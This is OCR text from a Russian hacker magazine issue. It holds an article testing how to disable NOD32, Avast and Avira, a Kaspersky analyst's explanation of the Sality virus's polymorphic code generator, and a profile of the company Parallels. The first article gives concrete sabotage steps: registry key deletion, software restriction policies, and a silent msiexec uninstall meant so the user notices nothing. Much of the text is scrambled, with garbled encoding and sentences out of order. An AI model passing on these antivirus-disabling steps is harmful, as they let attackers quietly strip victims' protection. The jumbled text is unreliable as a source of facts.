запрещает какие-либо опасные действия в отношении ключей. ïîñòîÿííûé àâòîð. доступны обновления. Разработчикам антивирусов будет над чем подумать и что усовершенствовать в следующих версиях своих продуктов. Победа? Заглянем в диспетчер задач. Экран потух и сразу же загорелся. Запускаем утилиту для теста. И то. Они оба. жестко пресекаются на уровне ядра. господа. хорошее дело. HIPS'ы там всякие. Если у нас не получилось их удалить. Проверку на прочность опять начинаем с NOD’а.exe. что мы видим. что сталось с NOD32.. Троечка. но верно переквалифицируется в салон красоты для котят. Своей очереди ждет NOD32. В безопасном режиме «лишние» драйвера не грузятся. что они защищают свои файлы с помощью своих же драйверов-фильтров ФС. ни через две антивирус так и не стартовал. Жмем кнопочку рестарта системы. Ëîçîâñêèé Àëåêñàíäð. мы ждем загрузки ОС. Проверить. не говоря уже о большой и жирной двойке? Похоже. что не дает ни единого шанса испортить работу антивиря из третьего кольца. что нам все же удалось ее (эту защиту) подточить. если честно. то попробуем хотя бы помешать им загрузиться. да еще такими несложными способами. После нажатия кнопочки OK и перезагрузки компьютера терпеливо ждем. наверное. То же самое и с шестым испытанием. к примеру. Аваст повел себя практически так же. удаления или изменения бинарников. или хотя бы на Avira AntiVir.. К нашему глубокому сожалению.exe все-таки был запущен. проактивки. основываясь на имени исполняемого файла. Цепь побед антивирусов прервана. «System». в том числе и у команды админов (в их число я не вхожу). что мы смогли вчистую деинсталлировать один популярный и небесплатный антивирус и лишить гуя парочку других. очень просто — достаточно загрузиться в Safe mode и проверить. кто же мешает провести диверсию. Наша самооценка потихоньку начинает расти. В конце концов. а вот прикладные пользовательские программы не стартовали.msc. ОС уже загрузилась. можно считать достойным результатом. что дает возможность беспрепятственно разобраться с антивирусом. поэтому обычными методами реестр испортить нельзя. Итак. Но у нас еще остается надежда на Аваст. Делается это тоже в нулевом кольце ОС. для 95% всех организаций вообще. порядка 100 машин. 074 XP. Мне как-то флешку принесли с документами. заключается в том. ÒÅÑÒ ¹4 Следующий тест мы будем проводить с помощью стандартных инструментов Windows XP Professional. как часы. которые неутомимо работают над их защитой. Эта опция позволяет запретить запуск определенных программ. Системный динамик тихо пикнул. XÀÊÅÐ 10 /141/ 10 . не больше. процесс ekrn. Далее следует кликнуть по элементу «User Configuration». То. ведь нам все-таки удалось сломить эти творения антивирусной индустрии. Откроется консоль с групповыми политиками. Все попытки записи. Маскировка.. но вот пользовательским интерфейсом нигде и не пахнет. работают как ни в чем не бывало. она будет справедлива. Картина идентична двум предыдущим. но значка антивируса не видно. а вирусы как чувствовали себя как на курорте. предварительно не забыв указать пути к файлам. ни через минуту. âðàã àíòèâèðóñîâ è ïîâåëèòåëü íóëåâîãî êîëüöà Позволю себе прокомментировать только одну ситуацию — возьмем. будет осуществляться с помощью все того же трюка с генерацией ключа. то есть нет значка в трее.exe и ekrn. Но не будем забывать и о других. затем «Administrative Templates». что. у каждого из этих продуктов за спиной несколько лет эволюции и большая команда довольно высокоинтеллектуальных разработчиков. не поддающегося эвристике. которые связаны с работой антивируса. половина из них имеют постоянный доступ в сеть. Однако. очень радует. входящих в состав антивируса. файерволы. Àëåêñàíäð Ýêêåðò. повергает нас в полное уныние.

который находится в вышеуказанной ветке реестра. Цель достигнута. хоть и с небольшими оговорками. мы обещали всего пять тестов. показали себя достаточно хорошо. удалив подключ ekrn. но после аваста рука не поднимается — а вдруг кто-то сообразит. А что же с Avira AntiVir Personal? Инсталлятор у этого антивируса тоже самодельный и никакими законными методами скрытый режим удаления мы отыскать не смогли. остались неприкосновенны.7 балла. Через минуту компьютер перезагрузится и от антивируса не останется и следа. Вызывается он более чем странно: C:\Program Files\Alwil Software\Avast5\aswRunDll. Avira AntiVir повел себя точно так же. к тому же. жаль. Все антивирусы.Âîò òàê âûãëÿäèò îáíîâëåííûé Àâàñò Ïðîöåäóðà óäàëåíèÿ avast! Antivirus Free íà ïåðâûé âçãëÿä ÒÅÑÒ ¹5 Пятой будет попытка полного удаления защитного ПО с помощью штатного инсталлятора. После старта ОС иконка NOD’а в трее не появилась. И завершает список ESET NOD32 с жалким результатом в 3. службы и драйверы живут вот в такой ветке: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\. раскинул свои щупальца по всей системе. Но мы не отчаиваемся и пробуем сломать хотя бы запуск UI-части. Лучшим оказался avast! Free Antivirus набрав 4. как и NOD32 — записи реестра. который стартует при запуске ОС и служит для общения с пользователем. Например. когда пользователю не задается никаких лишних вопросов. также оканчивается неудачей. Аваст получает пятерку. Но и удаление ключей. Также им XÀÊÅÐ 10 /141/ 10 постоянно запущена служба. стремился к лучшему. ответственные за запуск антивируса.2 балла. Все эти компоненты прописаны в системном реестре. Попробуем помешать старту службы ekrn.exe. Но слишком хорошие результаты проверки антивирусов не давали нам покоя. Да и. к нашему сожалению. Для тихого удаления нужно выполнить команду. что и у NOD’а. Чтобы. Практически у всех современных инструментов для развертывания приложений в системе есть так называемый «тихий режим». ответственных за старт службы и драйвера. и мы решили устроить им еще одно испытание. ÈÒÎÃÈ Испытания закончены. и мы радостно перезагружаем компьютер. У него есть собственный драйвер для мониторинга обращений к файловой системе и реестру Windows.exe. Ну. Авира получает троечку. Для этого идем в HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run и находим там параметр. значит. На втором месте Avira AntiVir Personal — 4. и пытаться их удалить. dll" RunSetup. Удалять мы будем так. Жаль. нельзя же так просто дать себя удалить из системы! Для анынсталла avast! Free Antivirus использует собственный модуль. z 075 . вроде бы можно поставить и пятерочку. Сейчас мы будем искать ключи реестра. отключить автозагрузку UI-части антивируса нам тоже не удалось. Но даже если бы нам удалось скрыть окно удаления программы. картинку). как и все уважающие себя антивирусы. Удаляется этот параметр очень даже хорошо. То есть. Вот с помощью этого режима мы и будем проводить диверсию. ничего.8 балла. как скрыто запустить процесс анинсталла? Поэтому я предлагаю всадить Авире четверочку. Начнем с NOD32. ESET NOD32 получает тройку. Следующий по списку — avast. а вот стандартный авторан был безжалостно удален из реестра. похожую на эту: Óäàëèòü ÍÎÄ îêàçàëîñü ïðîùå âñåãî msiexec /quiet /uninstall {1A59064A-12A9-469F-99F604BF118DBCFF} Разумеется. то пользователь бы увидел это (см. ответственный за запуск egui. NOD32. Все важные для запуска параметры находятся в тех же местах.exe "C:\Program Files\Alwil Software\Avast5\Setup\setiface. предварительно подставив в нее нужный GUID. За такую бдительность avast получает твердую пятерку. служащие гарантией загрузки служб и драйверов. Словацкий антивирус получает заслуженную двойку. Жмем кнопочку Del на клавиатуре и в ответ получаем безрадостное Access denied. в следующий раз мы придумаем еще более бесчеловечные способы и обязательно тебя с ними познакомим. которая осуществляет управление драйвером и модуль UI. ÒÅÑÒ ¹6 Да. Все наши попытки запустить тихий режим окончились неудачей. С драйвером та же история. чтобы пользователь ничего не заметил. Установка и удаление NOD’а выполняется с помощью стандартного майкрософтовского инсталлятора.

сгенерированного обычным компилятором. ведь в ней мы рассмотрим тонкости формирования x86-инструкций – префиксы. ÎÒÐÀÆÀÞÙÀß ÀËÃÎÐÈÒÌ ÐÀÁÎÒÛ ÏÎËÈÌÎÐÔÍÎÃÎ ÃÅÍÅÐÀÒÎÐÀ ÑÕÅÌÀ ÇÀÐÀÆÅÍÈß PE – ÔÀÉËÀ ÂÈÐÓÑÎÌ Virus. Также не останутся без внимания общие схемы работы обфускатора и непосредственно генератора кода.AA Ó÷èìñÿ ðàñïîçíàâàòü ïîëèìîðôèçì è îáôóñêàöèþ êîäà íà ïðèìåðå èçâåñòíîãî âèðóñà Наш сегодняшний разбор будет посвящен полиморфному генератору инструкций.Sality.aa. Основной его функционал – заражение PE-файлов. применяемому в известном вирусе Virus.Sality – «a» – появилась еще в 2003 году. но в них было мало качественных изменений и они не получили широкого распространения. скачивание и установка BackDoor’а. Он в полной мере полиморфен. В течение пяти лет было выпущено немало версий. код его сильно и качественно обфусцирован. модификация «aa» – в июле 2008 года. по которым можно отличить обфусцированный и потенциально зловредный код от стандартного.Win32.MALWARE Закоржевский Вячеслав. а одна из последних. на эту статью у нас большие планы. старший вирусный аналитик « Лаборатории Касперского» Òî÷êà âõîäà ïñåâäîêîä Òî÷êà âõîäà Ñåêöèÿ êîäà êîìïèëÿöèÿ ìàøèííûé êîä îáôóñêàöèÿ îáôóñöèðîâàííûé ìàøèííûé êîä ñ äîáàâëåíèåì FakeAPI Header äîáàâëåíèå îáôóñöèðîâàííûé àíòèýìóëÿöèè ìàøèííûé êîä Ïðîöåññ çàðàæåíèÿ Äðóãèå ñåêöèè Header Ñòàðòîâûé êîä âèðóñà Ñåêöèÿ êîäà Äðóãèå ñåêöèè Îðèãèíàëüíûé ôàéë Íîâàÿ ñåêöèÿ ñ îñíîâíûì òåëîì âèðóñà Çàðàæåííûé ôàéë ÑÕÅÌÀ. поля ModRM. распространение с помощью съемных носителей. 076 Для начала рассмотрим сам вирус.Win32. SIB.aa -ÏÐÅÏÀÐÀÖÈß: ÂÑÊÐÛÂÀÅÌ ÕÈÒÐÛÉ SALITY.Win32. XÀÊÅÐ 10 /141/ 10 . А вот экземпляр Virus.Win32. и опишем признаки. Самая первая модификация Virus.aa получился на редкость «удачным» – он отлично распространяется и обходит антивирусы. Если честно.Sality. опкоды. Он позволяет получать различный обфусцированный код с применением FakeAPI при каждом его использовании. Именно этот зловред является отличным примером для разбора.Sality. С момента своего выпуска он занял лидирующие позиции в рейтингах вирусной активности и остается в них вплоть до настоящего времени. Но и это еще не все. а также снабжен антиэмуляцией на основе вызова API-функций.

Атрибуты последней секции задаются таким образом. можно получить довольно большое количество исполнений такого простого алгоритма. Генератор в обоих случаях используется одинаковый. чтобы сохранить исходное состояние процессора. добавленной вирусом. CALL REG. На самом начальном этапе генератор получает на вход так называемый псевдокод. SUB REG. как передать управление оригинальной программе. Подробнее о нем будет написано ниже. опять-таки. представленных на иллюстрациях. IMM.Sality. Отличным примером такой модели является EPO (Entry Point Obscuring) – вирус Virus. Самый последний этап (четвертый) также может быть выполнен по-разному (считаем. Итак.Win32. Третий и четвертый этапы. полученный на втором этапе. в отличие от первого. чтобы усложнить анализ. содержащие сгенерированный код. что адрес. полученное на втором этапе. MOV REG. RETN. большинство инструкций не несут полезной нагрузки. а под IMM – числовое значение любой размерности. Также в начальный файл добавляется дополнительная секция с полиморфным декриптором.Win32. Каждый этап по-своему интересен и будет рассмотрен довольно подробно прямо сейчас. Расположение самой точки входа остается неизменным. Способов вычисления очень много. ADD REG. Схема заражения PE-файла вирусом Virus. êîä åãî ñèëüíî è êà÷åñòâåííî îáôóñöèðîâàí. И начатое дело завершается добавлением одной или нескольких фэйковых API-функций в код. а применение FakeApi позволяет легко обойти некоторые эмуляторы. которая зашифрована.Полиморфизм отлично проявляется при заражении файлов – каждый раз генерируется совершенно разный код. но большинство из них являются так называемыми PoC (Proof of Concept) и не получили широко распространения. помимо выполнения перехода. и чтобы перед тем. причем полученный машинный код получается каждый раз разными способами. На скриншотах приведен полный участок стартового кода вируса. расположенный по точке входа. Для вычисления адреса перехода используется значение. писать и исполнять. В его задачу входит формирование кода с заданными свойствами.Zombie. располагается на вершине стека): POP REG. Второй обладает богатой функциональностью. а добавлены только для того. задающие возможный вид получаемой команды. существуют и другие вирусы с аналогичной «начинкой». IMM. Красными овалами выделены инструкции. В приведенных выше примерах и далее по тексту под REG подразумевается любой 32-битный регистр общего назначения. в целом. чтобы в ней можно было читать. что можно исполнить с помощью четырех–шести инструкций. ADD [ESP]. который во время исполнения расшифровывает и исполняет «полезную нагрузку» вируса.aa Перейдем непосредственно к генератору. В данном файле вычисление адреса для перехода реализуется аж семью командами. • Вычислить VA перехода. Псевдокод представляет собой совокупность команд.áàéòîâûé îïêîä). всегда по-разному. в отличие от первого и второго. опять-таки с использованием генератора случайных чисел. сгенерированный «на лету». Однако без применения обфускации назначение полученного кода весьма очевидно при просмотре дизассемблерного листинга. соответствующие всем этапам псевдокода. Псевдокод стартового участка вируса довольно прост. реализуются в Sality множеством способов. он обладает идентичной функциональностью. отражающих определенную функциональность и понятных для человека. Вот его логика: • Сохранить оригинальные значения регистров и флагов. при этом в файле присутствует статичная область кода. Приведем некоторые из них (будем считать. Обфускация реализована практически идеально – то. Далее происходит компиляция. Как видно из дизассемблерных листингов. на свой собственный. определенного размера и выполняющего заданный псевдокод. Оверлей исходного файла «отодвигается» в конец. Весь процесс показан на схеме. Sality заменяет оригинальный код приложения. Совмещая все возможные варианты каждой из операций. Вся работа генератора XÀÊÅÐ 10 /141/ 10 будет пояснена на первом участке. Теперь о самой технике заражения. восстанавливающую оригинальные значения регистров. Они располагаются по точке входа и в начале новой секции. что в REG находится необходимый Sality адрес назначения): JMP REG. вследствие чего при беглом просмотре код получается практически идентичным. PUSH REG. начиная с точки входа зараженного файла: Стартовый код Virus. но.Sality. Выше было написано. Таким образом. POP REG. то его функциональность сохранится. если инсталлятор с данными в оверлее подвергнется заражению.aa в зараженном файле Теперь перейдем к обзору обфускации. Статический анализ дизассемблерного листинга сопряжен.èëè äâóõ. на схеме этот фрагмент называется «стартовый код вируса». Вызов PUSHAD нужен. по понятным причинам. который содержит логику исполняемого фрагмента. • Получить VA текущего. растянуто на 0x300–0x400 байт кода. со значительными трудностями. можно было вызвать инструкцию POPAD. IMM. После этого машинный код подвергается обфускации. Так каким же образом работает генератор? В общем случае алгоритм выглядит следующим образом: Îí â ïîëíîé ìåðå ïîëèìîðôåí. à òàêæå ñíàáæåí àíòèýìóëÿöèåé íà îñíîâå âûçîâà API–ôóíêöèé Схема. В этом и заключается полиморфизм. получая на входе определенные параметры. а на выходе – готовую инструкцию: ãåíåðàöèÿ îïêîäà èç ñïèñêà (îäíî. отражающая алгоритм работы полиморфного генератора Поясним приведенную схему. В последних используются соответственно инструкции PUSHAD и CALL. и будет слишком сложным для разбора. А вызов команды CALL. • Выполнить переход по вычисленному VA. [ESP]. Сам обфускатор работает в несколько этапов. чего не скажешь об «обработанном» коде. кладет в стек виртуальный адрес (VA) следующей инструкции. что в Sality формируется две области. Конечно. 077 .Win32.

F3 – REP. обратимся к первоисточнику – документации Intel. Генератор. ADD EAX. А есть такие опкоды. Он может быть как однобайтовый. Каждый префикс занимает один байт. поле Reg/Opcode указывает на саму операцию. но это не будет затронуто в статье. F2 – REPNE. Все три последовательности инструкций не несут никакой полезной нагрузки. которые он может использовать и. и в то же время поле R/M равно 4. образующим инструкцию является префикс. MOV EAX. 0B8h – MOV eAX. каждая инструкция обязана включать в себя опкод. NOP. EAX. [EAX]. NOP. Этапы 2 – 4 опираются на результат первого. INC EAX. нам нужно создать код. Таким образом получается. Всего их одиннадцать: ECX. äîáàâëåíèå ïðîèçâîëüíîãî ÷èñëîâîãî îïåðàíäà. PUSHAD – 60h. часть 2А. PUSH EBX. а именно – «IA-32 Intel® Architecture Software Developer’s Manual». например.MALWARE Ñóðîâàÿ êðàñîòà èñõîäíîãî êîäà. 64 – FS — // — // -. Если его значение равно 3. POP ECX. Например. показанных на схеме: Mod. Он также показан на схеме. äîáàâëåíèå ïðåôèêñà ê ïîëó÷åííîé èíñòðóêöèè. который заполняет регистр EAX значением «0». 0xC1. 36 – SS — // — // -. FakeAPI — âûçîâ ïðîèçâîëüíûõ API–ôóíêöèé. то он является двухбайтовым. R/M. MOV EDX. Конкретный пример: PUSHAD. то появляется еще один байт – SIB. чтобы «замусорить» полезный код. Допустим. Если первый байт Ëèêáåç: ïîëèìîðôèçì è îáôóñêàöèÿ Полиморфизм – возможность объектов с одинаковой спецификацией иметь различную реализацию. SUB EAX. PUSH EBP – 55h. ÔÎÐÌÀÒ ÈÍÑÒÐÓÊÖÈÈ ÀÐÕÈÒÅÊÒÓÐÛ X86 Итак. Основное назначение R/M и Reg/Opcode – указывать на операнды инструкции. что последовательность байт B8 FF FF FF FF эквивалентна инструкции MOV EAX. чтобы объяснить назначение всех упомянутых полей и само устройство элементарной инструкции процессора x86. то это регистр. 0. NOP. которые сами по себе образуют инструкцию. PUSH опкода равен 0Fh. Генератор работает не полностью случайно. EDX. Обфускация – приведение исходного текста или исполняемого кода программы к виду. 0FFFFFFFFh. 67 – Address Size. POP EBX. [EAX + ECX*4 + 600]. используемого инструкцией – память или регистр. 0xFFEEFFEF. 0x81. LEA EAX. соответственно. например. добавляя их к инструкции. А для некоторых опкодов. EAX. работающих с составными операндами памяти. но вполне могут быть использованы. сохраняющему ее функциональность. 2E – CS segment override. Они используются для придания инструкции определенных свойств. В этом и заключается полиморфизм – сделать одно и то же. понимание алгоритмов работы и модификацию при декомпиляции. Для того. возможные варианты байта ModRM. 0x80. 66 – Operand – Size. Так. Если в инструкции поле Mod не равно 3. Каждый опкод обладает определенными свойствами. Reg/ Opcode. только разными способами. ÷òî ýìóëÿòîð íå ïîääåðæèâàåò ðàáîòó ñ òàáëèöåé èìïîðòîâ èëè íå ìîæåò ðåàëèçîâàòü êîððåêòíîå èñïîëíåíèå Этот байт состоит из трех полей. Возможно множество реализаций: PUSH 0. Например: ADD EAX. lz. С помощью Mod’а определяется тип операнда. выполняемую инструкцией. XOR EAX. 65 – GS — // — // -. OR EAX. POPAD.и трехбайтовый. Гружено? Согласен! Приведем простой пример. â íàäåæäå íà òî. NOP. AND EAX. POP EAX. так и двух. Не к каждой инструкции можно безболезненно добавить префикс. а остальные возможные – память. 0xFFEEFFEE. Еще одним необязательным элементом. 0. У него есть определенный список опкодов. использует следующие четыре байта. например. Существуют опкоды. Íèæå ìû ðàçáåðåì åãî â ïîäðîáíîñòÿõ ãåíåðàöèÿ áàéòà ModRM. 3E – DS — // — // -. XÀÊÅÐ 10 /141/ 10 . 26 – ES — // — // -. не устанавливает поле Mod равным 3 для инструкции LEA. но затрудняющему анализ. не для всех опкодов существует байт ModRM и числовой операнд. Но у команды может быть сразу несколько префиксов. Он используется для формирования инструкций. в которых следующий байт несет определенный смысл и называется ModRM. Для трехбайтовых возможно несколько вариантов. 078 F0 – Lock.

к которым это запрещено делать! На что еще следует обратить внимание при просмотре кода? Например. который не взаимодействует с памятью. Но. достаточно только одного взгляда. значительно усложняют статический анализ и практически полностью «размывают» полезную нагрузку вируса. Этот метод используется для обхода простых эмуляторов или виртуальных машин. А байты REPNE/REP добавляются только к инструкциям. Как оказалось. работающими с памятью. в этой статье мы рассмотрели все этапы работы полиморфного генератора. MOVSD. SHL. Компилятор при генерации кода никогда не будет добавлять префиксы к тем командам. А в приведенном файле происходит исполнение FindClose (0) прямо с точки входа. в надежде на то. впоследствии просто стираются и не используются. результат их работы – регистр EAX или его составные части. в зависимости от режима работы. Такое. к примеру – SCASB. Их использование не по назначению может носить неопределенный характер. Переходим к самому последнему этапу генерации кода – добавление FakeAPI. их можно вручную добавить к произвольной команде. так как компилятор может использовать только регистры в коротких функциях. Исключение составляет команда LEA. Во-первых. В представленном дизассемблерном листинге в таком качестве используются две функции – FindCl ose и GetModuleHandleA. И напоследок – Sality добавляет байт 66h. В-третьих. во всех генерируемых инструкциях поле Mod равно 3. Генератор. функции FindClose должен передаваться корректный хэндл. z 079 . А теперь можно обсудить и те моменты. BTS. что явно не может иметь место в нормальном файле. что эмулятор не поддерживает работу с таблицей импортов или не может реализовать корректное исполнение. что довольно странно для нормальной программы. используется множество двухбайтовых опкодов. хотя. Генератор в Sality добавляет их к совершенно произвольным инструкциям. В представленном случае очень легко отличить фэйковые запуски от реальных вызовов. в котором перечислены API-функции. С помощью всех этих методов получается качественный обфусцированный код. F3H) cause an instruction to be repeated for each element of a string. он использует однобайтовые опкоды. Use these prefixes only with string instructions (MOVS. STOS. Префиксы размеров операнда и адреса изменяют соответственно их размеры на меньший или больший. для обращения к определенному сегменту. чтобы избежать взаимодействия с памятью. стоит отметить и тот факт. что применение всех этих «примочек» значительно упрощает определение вредоносного кода. но даже в ней нет такого обилия случайных чисел. А в документации Intel написано следующее: «Repeat prefixes (F2H. Так что же использует генератор Sality? Во-первых. использование префиксов F2 и F3 возможно лишь с ограниченным списком инструкций. TEST и прочими. such use may cause unpredictable behavior».Sality.Win32. и отсутствие локальных и глобальных переменных. полученного компилятором. а в приведенном выше примере кода эти байты находятся перед командами CALL. что перед тобой находится зловред. а также сегментные и REPxx префиксы к произвольным инструкциям. которые опять-таки не оперируют с памятью: SHLD. в то же время. иногда бывает. конечно. Так. а значит. К ним относятся все PUSH’ы и POP’ы. и то при определенных условиях. and OUTS). в Sality очень эффективно используется полиморфизм и обфускация. Аналогичная ситуация и с сегментными префиксами. LODSW. которые не несут полезной нагрузки. которые получают на вход только один параметр и не вносят никаких значительных изменений в систему. XADD и др. безусловно. а использование 3 приведет к генерации исключения. íî óæå â äðóãîì ôàéëå Согласно документации Intel каждый префикс может использоваться только в определенных целях. которые позволяют отличить сгенерированный код от кода. пользуется определенным списком.aa â çàðàæåííîì ôàéëå Åùå íåìíîãî âèðóñà. а оперировать только с другими регистрами или мгновенными значениями. когда реализуется какая–то функция из криптоалгоритма. BSF. Еще одна особенность полученного кода – совершенно произвольные числовые операнды. CMPS. Таким образом. целиком образующие инструкцию. А заключается он в вызове произвольной API-функции. работающим со строками или с массивом байт. при добавлении FakeAPI в конечный код. при должном опыте. полученный ранее с помощью FindFirstFile. INS. Use of repeat prefixes and/or undefined opcodes with other IA32 instructions is reserved. на практически полное отсутствие работы с памятью. Это весьма странно.Ñòàðòîâûé êîä Virus. Начнем с префиксов. но при этом значительно усложняет анализ кода. в которой Mod всегда равен 2. Во-вторых. LODS. Добавление FakeAPI также добавляет исследователю головной боли. В нем присутствует большое количество инструкций. чтобы определить. А в Sality байт 64h может без проблем предварять инструкXÀÊÅÐ 10 /141/ 10 Ôîðìàò èíñòðóêöèè àðõèòåêòóðû x86 цию CALL. Все сегментные префиксы используются совместно с инструкциями. ÇÀÊËÞ×ÅÍÈÅ Итак. SCAS. Во–вторых. BTC.

Гонконг. ни в тот раз. Несложно догадаться.что на сегодня он является гражданином Сингапура. почти аналогичное предприятие. как ты понимаешь. которе сегодня назвали бы стартапом. начинание получило имя Standard & Western. Именно МФТИ и стал отправной точкой для 080 074 Белоусова. îäíàêî äîñòèæåíèÿ ýòîé êîìïàíèè ñëîæíî íåäîîöåíèòü. Но останавливаться на достигнутом Сергей Белоусов снова не пожелал. а граджанство Сингапура получил лишь потому. что компанию создали и по сей день продолжают возглавлять очень интересные и яркие люди. сумевший поймать волну. Сергей — не очередной гениальный и удачливый самоучка. Нет.ru ÏÀÐÀËËÅËÈ IT-ÁÈÇÍÅÑÀ ÈÑÒÎÐÈß ÊÎÌÏÀÍÈÈ Parallels Íà ñåãîäíÿøíèé äåíü ëèøü ñ÷èòàííûì åäèíèöàì ðîññèéñêèõ ITêîìïàíèé óäàëîñü äîáèòüñÿ ñåðüåçíûõ óñïåõîâ çà ðóáåæîì. ПО наконец-то привлекло внимание Белоусова в середине 90-х годов. ради всеобщего удобства. и начнем наше повествование. где имеется «железо».xakep. Ëàáîðàòîðèÿ Êàñïåðñêîãî è Parallels. Все основные поставщики последней. работал».СЦЕНА Мария «Mifrill» Нефедова mifrill@real. Именно туда. всегда найдется место и софту. в основном сконцентрированы в странах Восточной Азии (Тайвань. Ïîñòàâëÿòü ñâîè ïðîäóêòû íà çàïàäíûé ðûíîê è óñïåøíî ðàáîòàòü ñ äðóãèìè ñòðàíàìè — çàîáëà÷íàÿ ìå÷òà. òî. спустя всего два года после основа- ния своего первого стартапа. Новая компания тоже занималась сборкой и производством.идеальныим местом для ведения дел оказался Сингапур. кстати. Дело в том. ËÞÄÈ История Parallels довольно запутанная и не самая тривиальная. тоже выпускником альма-матер Белоусова — МФТИ. что там. что фактически Сергей живет в дороге и отелях. по его собственному признанию. Его биография не похожа на стандартное «родился. Дело в том. Åñëè òåáÿ íå èíòåðåñóþò âèðòóàëüíûå ìàøèíû äëÿ «Ìàêîâ». ведь в далеком 1992 году именно здесь зародилось первое начинание Сергея. по части образования у него полный порядок: он имеет диплом бакалавра физики. Компания Standard & Western была основана совместно с Ильей Зубаревым. Сергей Белоусов (председатель совета директоров и исполнительный директор Parallels) Уроженец города Ленинграда Сергей Белоусов — человек крайне «нелинейной» судьбы.). пожалуй. скажем. Возникшее благадаря связям полученным на сборке компьютеров. «ïîùóïàòü» êîòîðóþ ïîêà ñìîãëè ëèøü èçáðàííûå: ABBYY. что путешествовать с российским паспортом было неудобно: приходилось получать много виз. и перебрался Белоусов. однако Белоусову вскоре захотелось большего. она уверенно развивалась. Взаимодействовать с ними оказалось удобнее не из России . ñêîðåå âñåãî. женился. но и это начинание Белоусова в будущем ждал немалый успех — впоследствии «железное» подразделение S&W переродится в хорошо известный на сегодняшний день бренд по производству электроники Rolsen. Сергей покинул молодую фирму и сразу же окунулся в другое. Забавно. В 1994. XÀÊÅÐ 10 /141/ 10 . что он «там живет». случайно. учился. Но вернемся к делам давно минувших дней и сборке компьютеров — дела у молодой компании шли неплохо. Забегая вперед скажем. С рассказа о некоторых из них мы. с одной лишь поправкой — вместо компов S&W производила телевизоры и компьютерные мониторы. Его фирма занималась сборкой и производством компов из импортной комплектухи. и произошло это. хотя и нельзя сказать. работе и развитии 50 с лишним проектов.д. ни в последующие годы. à òàêæå ÏÎ äëÿ àâòîìàòèçàöèè . Япония и т. зато за 20 последних лет он успел принять участие в основании. диплом с отличием магистра физики и электротехники и степень кандидата технических наук по специальности «Информатика» Московского физико-технического института (МФТИ). òû íå÷àñòî ñëûøèøü èìÿ Parallels.

Впрочем. Европа — больше 30%. S&W прекрасно справлялись с локализацией. Софтлайн и Русоникс. что нанимать других людей просто не получалось — нанимая русских. лишь одна компания — Solomon Software. но кто бы мог подумать. ориентированных на сегмент среднего и малого бизнеса. Доступа в Интернет тогда не было. После долгих переговоров. Так. По каким-то своим каналам. Дело в том. а также в нюансах его дистрибуции на рынках других стран. и другие российские инженеры. РБК. Продукты компании поддерживают более 1 млн. например. Партнерство. по всему миру. чем труд их западных коллег. хотя бы исходя из того. зато уровень знаний и квалификация. Дело в том. С другими же национальностями существовали культурные пробелы — мало того. как Мастерхост.PARALLELS DESKTOP — ÂÈÐÒÓÀËÜÍÀß ÌÀØÈÍÀ ÄËß «ÌÀÊλ Все началась с того. в целях банальной экономии. с «Соломон» были наведены партнерско-дистрибьютерские мосты. когда могли нанять местных за копейки?». Intel. Будущий лауреат премии имени Зворыкина. который они очень хотели поручить кому-нибудь из своих партнеров. серверов и настольных ПК. удалось составить список из 16 ERP-продуктов. в основном. Apple. XÀÊÅÐ 10 /141/ 10 менее хорошие российские вузы. окончившие не ÍÅÌÍÎÃÎ ÑÒÀÒÈÑÒÈÊÈ: Компания Parallels имеет более 30 наград и более 55 патентов. который также сыграл в Parallels одну из главных ролей. что команда Белоусова не могла судить. из наших с тобой соотечественников — там были и выпускники того же МФТИ. HP и IBM. что будущему Rolsen Electronics потребовалось внедрить бухгалтерскую систему.5 млн. Parallels Desktop для Mac. через бывших выпускников МФТИ. или были куда выше. Следующий этап в жизни компании можно назвать этапом продвинутого аутсорсинга. Команда S&W на тот момент состояла. является тулзой для Mac №1 от сторонних разработчиков. Ей пользуются свыше 2. но и просто не представляла. поставщика систем управления базами данных Solomon. по мнению многих экспертов. находились на том же уровне. проживавших в Америке и работавших в банках. Итак. AMD. Получить копию их дорогостоящего ПО. был и еще один нюанс. Осуществлять работу из России тоже не получалось. обернулось быстрорастущим бизнесом. можно было лишь пройдя сертификацию на знание их продукта и став реселлером компании. Николай Добровольский (вице-президент по развитию продуктов) Одновременно с историей Сергея Белоусова развивалась история еще одного человека. так что договоренность была достигнута быстро. чего можно от них ожидать. напротив. Standard & Western заинтересовался разработкой софта и довольно быстро сориентировался в тонкостях разработки ПО. что их труд стоил существенно дешевле. нужно было заниматься разработкой софта для компании Pervasive. Standard & Western на тот момент были заинтересованы в такого рода работе ничуть не меньше потенциального заказчика. У Parallels более 500 партнеров. конечных пользователей в 125 странах мира. что одними только бухгалтерскими системами и скидками дело не ограничится. из этого списка осталась ÑÅÐÃÅÉ ÁÅËÎÓÑΠИменно тогда 60 российских инженеров S&W стали работать из Сингапура. заключенное с Solomon Software случайно. 081 . Dell. А вскоре у «Соломона» нашелся еще один проект. какой ВУЗ закончил человек. фактически выполняя весь цикл инженерных разработок ПО Solomon. среди которых такие монстры. об уровне образования соискателей. По словам Сергея Белоусова Parallels Северная Америка обеспечивает чуть меньше 60% выручки. можно было оценить уровень их знаний. как Microsoft. а Россия пока приносит меньше 3%. Parallels обслуживает свыше 10 млн. Владельцы Solomon беспокоились по поводу сохранности исходных кодов и их возможного использования в плохо защищенной патентным правом стране. продвижением и поддержкой в Юго-Восточной Азии ERP-систем Solomon. На российском рынке клиентами Parallels являются такие крупные компании. По некоторым данным от 90% до 98% выручки Parallels получает за рубежом. Так что не стоит удивляться и спрашивать: «Зачем это они везли работников из России в Сингапур.

Баумана. У него появились и полезные знакомства. Как показало время. что разработчики обитают преимущественно в Москве. выше мы прервали историю Standard & Western на том. что для Николая было не менее важно. собственный продукт. и главное — желание достигнуть большего. затем поступил в школу при МГТУ им. Имя сменили из практических соображений: во-первых. а также умение находить общий язык с самыми разными людьми и никогда. при поддержке компании Siemens. Известно также. внутри одного физического компьютера. примерно вплоть до 2000 года. в которой на первых порах трудилось всего около десятка человек (в основном ребята. а офисы продаж и вовсе раскиданы по всем частям света (более чем в 15 странах мира). то есть програм- 082 мистом. на слух Standard & Western можно легко принять за Standard investment. По сути.СЦЕНА ÂÛÑÒÓÏËÅÍÈÅ ÁÅËÎÓÑÎÂÀ ÍÀ PARALLELS SUMMIT 2009 что он принялся оттачивать ее и далее. тогда был создан факультет. Добровольский (тогда — ученик 4-го класса) решил записаться в какой-нибудь кружок. Увы. Добровольский не прогадал и попал в свою стихию. Дело в том. электроники и автоматики (МИРЭА). куда Николай и подался. С темой виртуальных машин на десктопах. физически разместившись в 